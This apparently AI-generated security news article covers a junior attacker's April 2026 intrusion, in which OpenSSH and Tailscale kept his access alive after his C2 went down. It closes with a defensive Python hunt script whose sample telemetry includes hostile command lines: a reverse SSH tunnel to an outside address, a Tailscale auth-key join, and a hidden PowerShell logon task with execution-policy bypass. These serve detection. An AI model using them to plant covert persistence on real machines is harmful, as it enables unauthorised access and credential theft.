Ethical Hacking News

The Rogue Persistence Layer: A Cautionary Tale of Junior Hackers and Secure Communication Protocols



A recent intrusion by a junior hacker known as "Poisson" shows that taking a command-and-control (C2) server offline is not the same as evicting the attacker. Before his C2 server went down, Poisson installed OpenSSH Server and Tailscale on a victim machine and kept access for nearly three weeks. Defenders therefore have to look for the whole persistence layer, not just the C2 beacon.

Summary: A junior hacker used OpenSSH and Tailscale as a secondary persistence layer that kept working after the command-and-control (C2) server went offline. The case shows how ordinary, encrypted remote-access tools become persistence once an attacker installs them, and how much a low-skill intruder can achieve against a target whose response stops at the C2.

  • Poisson, a junior hacker, compromised four machines at a small French automotive business in April 2026 and later installed OpenSSH Server and Tailscale on one of them.
  • That install kept him connected for nearly three weeks, including the eighteen days his C2 server was offline.
  • Poisson used a VBScript stager with a sandbox-evasion delay, an in-memory PowerShell and .NET loader chain, and repeated UAC prompts to get elevated.
  • He ran a small Python keylogger that wrote keystrokes to a local file, and built a custom RustDesk client as a backup channel.
  • The case shows that an attacker with thin tradecraft can still succeed, and that legitimate encrypted tools such as OpenSSH and Tailscale make a durable, hard-to-spot persistence layer.
  • Defenders need to monitor for unexpected remote-access software, highest-privilege scheduled tasks and reverse tunnels, and to treat a C2 takedown as only the first step of remediation.



  • Among recent intrusions, the one attributed to a junior hacker known as "Poisson" stands out for a single detail: Poisson installed OpenSSH Server and Tailscale on a victim machine, building an encrypted access path that did not depend on his command-and-control (C2) server at all.

    In April 2026 a French-speaking attacker broke into a small French automotive business, planted a keylogger and stole banking and email credentials: an ordinary breach on its face. What makes it worth studying is that Poisson installed OpenSSH Server and Tailscale on the victim's machine before his C2 server went offline, and so kept access for nearly three weeks.

    To see how, it helps to walk through the attack chain. According to researchers at Cato Networks, who captured the entire operation command by command, Poisson used a VBScript stager with a sandbox-evasion delay to decrypt a PowerShell loader. That loader pulled down a .NET loader, which ran Havoc's Demon agent in memory without ever writing the implant to disk.

    To elevate on one of the victim machines, Poisson used Start-Process -Verb RunAs, which simply raises the UAC consent prompt and relies on the user clicking through; it is not a silent UAC bypass. It took him a dozen tries across two days before it worked. Once elevated, he created scheduled tasks that run at every logon with highest privileges, injected shellcode into Explorer.exe, and built a custom RustDesk client as a backup channel.

    The keylogger was about 70 lines of Python that wrote keystrokes to a local file. There was no beacon and no exfiltration server: Poisson logged in, collected the file by hand, and ran powercfg to stop the machines from sleeping so the capture never paused.

    In the move that matters most, Poisson installed OpenSSH Server and Tailscale on the victim's machine during a five-hour overnight session. He joined the machine to his private Tailscale network, set up key-based SSH, and established a reverse tunnel. From then on he could reach the machine over Tailscale's encrypted mesh with no C2 server in the path and no inbound port exposed on the victim's network.

    So when the Havoc server went offline, Poisson's access did not go with it. Eighteen days later the C2 came back, and his agents reconnected automatically without any re-compromise. Over the final five days he ran 145 more commands, probed smart-card and certificate stores, and ran two unexplained executables from a file named Thales.zip for about 32 minutes in total.

    The takeaways for defenders are concrete. First, as the Cato researchers stress, pulling a C2 server offline is not remediation if the attacker has already built a separate door. Here that door was made of legitimate software: OpenSSH and Tailscale are encrypted, well-maintained tools, and exactly those properties made them a durable persistence layer that looked nothing like malware.

    Second, the case shows how far a junior operator can get. Poisson's tradecraft was thin and he failed at roughly half of what he tried, yet he still compromised four machines.

    Last, the operation points to specific things to hunt for on Windows workstations:
  • OpenSSH Server installs on machines that never needed one
  • Tailscale.exe on machines that have no reason to run a VPN
  • Reverse tunnels heading to outside hosts
  • WScript.exe running .vbs files out of user staging folders
  • Scheduled tasks set to highest privileges that launch script interpreters
  • powercfg standby-timeout changes that keep machines awake
  • DuckDNS traffic, which should be blocked
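    The indicators above can be checked mechanically. What follows is an added example, not code from Cato Networks or from the original article: a small Python hunt that applies one rule per indicator to process-creation records and inspects Task Scheduler XML for logon tasks that run at highest privilege and launch a script interpreter. The records are constructed for the example, with field names modelled on Sysmon Event ID 1 (Image, CommandLine); the host, user, paths, key file and tailnet address in them are invented, not taken from the Cato report. The rules assume the fleet being searched consists of workstations that have no business running sshd or Tailscale.

```python
"""Hunt rules for a Poisson-style persistence layer (added example, not Cato's code).

Input records are constructed; their field names follow Sysmon Event ID 1
(Image, CommandLine).  Task definitions use the Task Scheduler XML schema that
Windows emits for `schtasks /query /xml` and Export-ScheduledTask.
"""
import re
import xml.etree.ElementTree as ET

SCRIPT_INTERPRETERS = {"wscript.exe", "cscript.exe", "powershell.exe",
                       "pwsh.exe", "mshta.exe", "cmd.exe"}
# Lower-case path fragments of the user-writable folders attackers stage into.
USER_STAGING_DIRS = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\",
                     "\\downloads\\", "\\users\\public\\")
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# OpenSSH remote forward: -R [bind:]port:host:port (the command line is lower-cased first).
REVERSE_TUNNEL = re.compile(r"(?:^|\s)-r\s*(?:[\w.\[\]*-]+:)?\d+:[\w.\[\]-]+:\d+")


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()


def check_process(event):
    """Return the hunt rules a single process-creation record trips (empty list = clean)."""
    image = _basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "").lower()
    hits = []
    if image in ("tailscale.exe", "tailscaled.exe"):
        hits.append("tailscale-on-workstation")
    if image == "sshd.exe":
        hits.append("openssh-server-on-workstation")
    if "openssh.server" in cmd:  # e.g. Add-WindowsCapability -Name OpenSSH.Server~~~~0.0.1.0
        hits.append("openssh-server-install")
    if image == "ssh.exe" and REVERSE_TUNNEL.search(cmd):
        hits.append("ssh-reverse-tunnel")
    if (image in ("wscript.exe", "cscript.exe") and ".vbs" in cmd
            and any(d in cmd for d in USER_STAGING_DIRS)):
        hits.append("vbs-from-user-staging")
    if image == "powercfg.exe":
        m = re.search(r"standby-timeout-(?:ac|dc)\s+(\d+)", cmd)
        if m and int(m.group(1)) == 0:  # a timeout of 0 minutes means "never sleep"
            hits.append("powercfg-standby-disabled")
    return hits


def is_suspicious_logon_task(task_xml):
    """True when a task fires at logon, runs as HighestAvailable and launches a script interpreter."""
    root = ET.fromstring(task_xml)
    at_logon = root.find(".//t:Triggers/t:LogonTrigger", TASK_NS) is not None
    run_level = root.findtext(".//t:Principals/t:Principal/t:RunLevel", default="", namespaces=TASK_NS)
    command = root.findtext(".//t:Actions/t:Exec/t:Command", default="", namespaces=TASK_NS)
    return at_logon and run_level == "HighestAvailable" and _basename(command) in SCRIPT_INTERPRETERS


def hunt(events, tasks):
    """Run every rule; returns (rule, evidence) pairs in input order."""
    findings = [(rule, ev["CommandLine"]) for ev in events for rule in check_process(ev)]
    findings += [("highest-privilege-logon-task-runs-interpreter", name)
                 for name, xml in tasks.items() if is_suspicious_logon_task(xml)]
    return findings


# Constructed sample telemetry: invented host, user, key path and tailnet address.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'wscript.exe "C:\Users\jdupont\AppData\Local\Temp\facture.vbs"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0"},
    {"Image": r"C:\Windows\System32\OpenSSH\sshd.exe", "CommandLine": "sshd.exe"},
    {"Image": r"C:\Program Files\Tailscale\tailscale.exe",
     "CommandLine": "tailscale.exe up --authkey tskey-auth-REDACTED"},
    {"Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "CommandLine": r"ssh.exe -N -R 2222:127.0.0.1:22 -i C:\ProgramData\id_ed25519 op@100.64.0.9"},
    {"Image": r"C:\Windows\System32\powercfg.exe", "CommandLine": "powercfg.exe /change standby-timeout-ac 0"},
    # Benign noise: an admin setting a 30-minute sleep timer and an ordinary notepad launch.
    {"Image": r"C:\Windows\System32\powercfg.exe", "CommandLine": "powercfg.exe /change standby-timeout-ac 30"},
    {"Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
]

SAMPLE_TASKS = {
    "\\Updater": """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec>
    <Command>powershell.exe</Command><Arguments>-w hidden -ep bypass -f C:\\Users\\Public\\u.ps1</Arguments>
  </Exec></Actions>
</Task>""",
    "\\Backup\\Nightly": """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2026-04-01T02:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\\Program Files\\Backup\\backup.exe</Command></Exec></Actions>
</Task>""",
}

if __name__ == "__main__":
    for rule, evidence in hunt(SAMPLE_EVENTS, SAMPLE_TASKS):
        print(f"{rule:45s} {evidence}")
```

    Run stand-alone it prints one line per finding: the six suspicious process records trip one rule each and the "\Updater" task is flagged, while the 30-minute powercfg change, notepad and the nightly backup task stay silent. In production the same functions would be fed from Sysmon or EDR process telemetry and from exported task XML, and the sshd and Tailscale rules would be scoped to the workstation population so that servers which legitimately run them do not page the SOC.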

    Cato leaves open what was in Thales.zip and what those two programs did on the machine. What matters more is that the C2 was never the intrusion, only one way into it. Killing the C2 server leaves OpenSSH, Tailscale, the scheduled tasks and the keylogger running, and the attacker keeps his access.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/The-Rogue-Persistence-Layer-A-Cautionary-Tale-of-Junior-Hackers-and-Secure-Communication-Protocols-ehn.shtml

  • https://thehackernews.com/2026/06/junior-hacker-used-tailscale-and.html


  • Published: Wed Jun 17 22:20:55 2026 by llama3.2 3B Q4_K_M
    © Ethical Hacking News . All rights reserved.